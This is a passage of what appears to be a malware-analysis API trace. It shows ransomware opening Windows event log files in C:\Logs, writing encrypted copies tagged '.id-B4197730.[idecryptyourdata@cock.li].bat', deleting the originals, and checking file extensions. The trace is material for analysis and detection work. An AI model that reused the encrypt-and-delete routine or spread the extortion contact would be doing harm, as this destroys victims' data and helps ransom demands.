lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x132, lpOverlapped=0x0) returned 1 [0066.897] SetEndOfFile (hFile=0x344) returned 1 [0066.897] CloseHandle (hObject=0x344) returned 1 [0066.898] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.898] SetEndOfFile (hFile=0x368) returned 1 [0066.899] CloseHandle (hObject=0x368) returned 1 [0066.899] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0066.899] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx")) returned 1 [0066.899] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0066.899] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0066.899] lstrlenW (lpString=".doc") returned 4 [0066.899] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.899] lstrlenW (lpString=".docx") returned 5 [0066.899] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.899] lstrlenW (lpString=".pdf") returned 4 [0066.899] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.899] lstrlenW (lpString=".xls") returned 4 [0066.899] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.899] lstrlenW (lpString=".xlsx") returned 5 [0066.899] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.899] lstrlenW (lpString=".ppt") returned 4 [0066.899] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.900] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0066.900] lstrlenW (lpString=".zip") returned 4 [0066.900] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.900] lstrlenW (lpString=".rar") returned 4 [0066.900] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.900] lstrlenW (lpString=".bz2") returned 4 [0066.900] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.900] lstrlenW (lpString=".7z") returned 3 [0066.900] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.900] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0066.900] lstrlenW (lpString=".dbf") returned 4 [0066.900] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.900] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0066.900] lstrlenW (lpString=".1cd") returned 4 [0066.900] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.900] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0066.900] lstrlenW (lpString=".jpg") returned 4 [0066.900] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.900] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0066.900] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0066.900] lstrlenW (lpString=".doc") returned 4 [0066.900] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.900] lstrlenW (lpString=".docx") returned 5 [0066.900] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.900] lstrlenW (lpString=".pdf") returned 4 [0066.900] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.900] lstrlenW (lpString=".xls") returned 4 [0066.900] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.900] lstrlenW (lpString=".xlsx") returned 5 [0066.900] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.900] lstrlenW (lpString=".ppt") returned 4 [0066.901] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.901] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0066.901] lstrlenW (lpString=".zip") returned 4 [0066.901] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.901] lstrlenW (lpString=".rar") returned 4 [0066.901] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.901] lstrlenW (lpString=".bz2") returned 4 [0066.901] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.901] lstrlenW (lpString=".7z") returned 3 [0066.901] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.901] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0066.901] lstrlenW (lpString=".dbf") returned 4 [0066.901] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.901] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0066.901] lstrlenW (lpString=".1cd") returned 4 [0066.901] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.901] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0066.901] lstrlenW (lpString=".jpg") returned 4 [0066.901] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.901] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0066.901] lstrlenW (lpString="Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 47 [0066.901] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.902] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0066.902] CloseHandle (hObject=0x368) returned 1 [0066.902] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx")) returned 0x20 [0066.902] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0066.902] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.902] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.902] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.902] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0066.902] GetLastError () returned 0x0 [0066.902] ReadFile (in: hFile=0x368, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0066.923] WriteFile (in: hFile=0x344, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0066.925] ReadFile (in: hFile=0x368, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.925] WriteFile (in: hFile=0x344, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x132, lpOverlapped=0x0) returned 1 [0066.925] SetEndOfFile (hFile=0x344) returned 1 [0066.925] CloseHandle (hObject=0x344) returned 1 [0066.925] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.925] SetEndOfFile (hFile=0x368) returned 1 [0066.926] CloseHandle (hObject=0x368) returned 1 [0066.926] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0066.926] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx")) returned 1 [0066.927] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0066.927] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0066.927] lstrlenW (lpString=".doc") returned 4 [0066.927] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.927] lstrlenW (lpString=".docx") returned 5 [0066.927] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.927] lstrlenW (lpString=".pdf") returned 4 [0066.927] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.927] lstrlenW (lpString=".xls") returned 4 [0066.927] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.927] lstrlenW (lpString=".xlsx") returned 5 [0066.927] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.927] lstrlenW (lpString=".ppt") returned 4 [0066.927] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.927] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0066.927] lstrlenW (lpString=".zip") returned 4 [0066.927] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.927] lstrlenW (lpString=".rar") returned 4 [0066.927] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.927] lstrlenW (lpString=".bz2") returned 4 [0066.927] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.927] lstrlenW (lpString=".7z") returned 3 [0066.927] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.927] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0066.927] lstrlenW (lpString=".dbf") returned 4 [0066.927] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.927] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0066.927] lstrlenW (lpString=".1cd") returned 4 [0066.928] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.928] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0066.928] lstrlenW (lpString=".jpg") returned 4 [0066.928] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.928] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0066.928] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0066.928] lstrlenW (lpString=".doc") returned 4 [0066.928] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.928] lstrlenW (lpString=".docx") returned 5 [0066.928] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.928] lstrlenW (lpString=".pdf") returned 4 [0066.928] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.928] lstrlenW (lpString=".xls") returned 4 [0066.928] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.928] lstrlenW (lpString=".xlsx") returned 5 [0066.928] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.928] lstrlenW (lpString=".ppt") returned 4 [0066.928] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.928] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0066.928] lstrlenW (lpString=".zip") returned 4 [0066.928] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.928] lstrlenW (lpString=".rar") returned 4 [0066.928] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.928] lstrlenW (lpString=".bz2") returned 4 [0066.928] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.928] lstrlenW (lpString=".7z") returned 3 [0066.928] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.928] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0066.928] lstrlenW (lpString=".dbf") returned 4 [0066.928] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.928] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0066.929] lstrlenW (lpString=".1cd") returned 4 [0066.929] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.929] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0066.929] lstrlenW (lpString=".jpg") returned 4 [0066.929] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.929] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0066.929] lstrlenW (lpString="Microsoft-Windows-Shell-Core%4Operational.evtx") returned 46 [0066.929] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.929] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0066.929] CloseHandle (hObject=0x368) returned 1 [0066.929] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx")) returned 0x20 [0066.929] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0066.929] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.929] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.929] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.930] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0066.930] GetLastError () returned 0x0 [0066.930] ReadFile (in: hFile=0x368, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0067.894] WriteFile (in: hFile=0x344, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.246] ReadFile (in: hFile=0x368, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.246] WriteFile (in: hFile=0x344, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x130, lpOverlapped=0x0) returned 1 [0068.246] SetEndOfFile (hFile=0x344) returned 1 [0068.246] CloseHandle (hObject=0x344) returned 1 [0068.246] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.246] SetEndOfFile (hFile=0x368) returned 1 [0068.248] CloseHandle (hObject=0x368) returned 1 [0068.248] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.248] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx")) returned 1 [0068.248] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0068.248] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0068.248] lstrlenW (lpString=".doc") returned 4 [0068.248] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.248] lstrlenW (lpString=".docx") returned 5 [0068.249] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.249] lstrlenW (lpString=".pdf") returned 4 [0068.249] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.249] lstrlenW (lpString=".xls") returned 4 [0068.249] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.249] lstrlenW (lpString=".xlsx") returned 5 [0068.249] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.249] lstrlenW (lpString=".ppt") returned 4 [0068.249] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.249] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0068.249] lstrlenW (lpString=".zip") returned 4 [0068.249] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.249] lstrlenW (lpString=".rar") returned 4 [0068.249] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.249] lstrlenW (lpString=".bz2") returned 4 [0068.249] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.249] lstrlenW (lpString=".7z") returned 3 [0068.249] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.249] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0068.249] lstrlenW (lpString=".dbf") returned 4 [0068.249] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.249] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0068.249] lstrlenW (lpString=".1cd") returned 4 [0068.249] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.249] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0068.249] lstrlenW (lpString=".jpg") returned 4 [0068.249] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.249] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0068.249] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0068.249] lstrlenW (lpString=".doc") returned 4 [0068.249] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.249] lstrlenW (lpString=".docx") returned 5 [0068.249] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.249] lstrlenW (lpString=".pdf") returned 4 [0068.249] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.249] lstrlenW (lpString=".xls") returned 4 [0068.249] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.249] lstrlenW (lpString=".xlsx") returned 5 [0068.250] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.250] lstrlenW (lpString=".ppt") returned 4 [0068.250] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.250] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0068.250] lstrlenW (lpString=".zip") returned 4 [0068.250] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.250] lstrlenW (lpString=".rar") returned 4 [0068.250] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.250] lstrlenW (lpString=".bz2") returned 4 [0068.250] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.250] lstrlenW (lpString=".7z") returned 3 [0068.250] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.250] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0068.250] lstrlenW (lpString=".dbf") returned 4 [0068.250] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.250] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0068.250] lstrlenW (lpString=".1cd") returned 4 [0068.250] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.250] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0068.250] lstrlenW (lpString=".jpg") returned 4 [0068.250] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.250] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.250] lstrlenW (lpString="Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 46 [0068.250] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0068.272] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0068.272] CloseHandle (hObject=0x368) returned 1 [0068.272] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx")) returned 0x20 [0068.272] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.272] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0068.272] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.272] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.272] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0068.273] GetLastError () returned 0x0 [0068.273] ReadFile (in: hFile=0x368, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.283] WriteFile (in: hFile=0x344, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.285] ReadFile (in: hFile=0x368, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.285] WriteFile (in: hFile=0x344, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x130, lpOverlapped=0x0) returned 1 [0068.285] SetEndOfFile (hFile=0x344) returned 1 [0068.285] CloseHandle (hObject=0x344) returned 1 [0068.285] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.285] SetEndOfFile (hFile=0x368) returned 1 [0068.286] CloseHandle (hObject=0x368) returned 1 [0068.286] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.286] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx")) returned 1 [0068.287] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0068.287] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0068.287] lstrlenW (lpString=".doc") returned 4 [0068.287] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.287] lstrlenW (lpString=".docx") returned 5 [0068.287] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.287] lstrlenW (lpString=".pdf") returned 4 [0068.287] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.287] lstrlenW (lpString=".xls") returned 4 [0068.287] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.287] lstrlenW (lpString=".xlsx") returned 5 [0068.287] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.287] lstrlenW (lpString=".ppt") returned 4 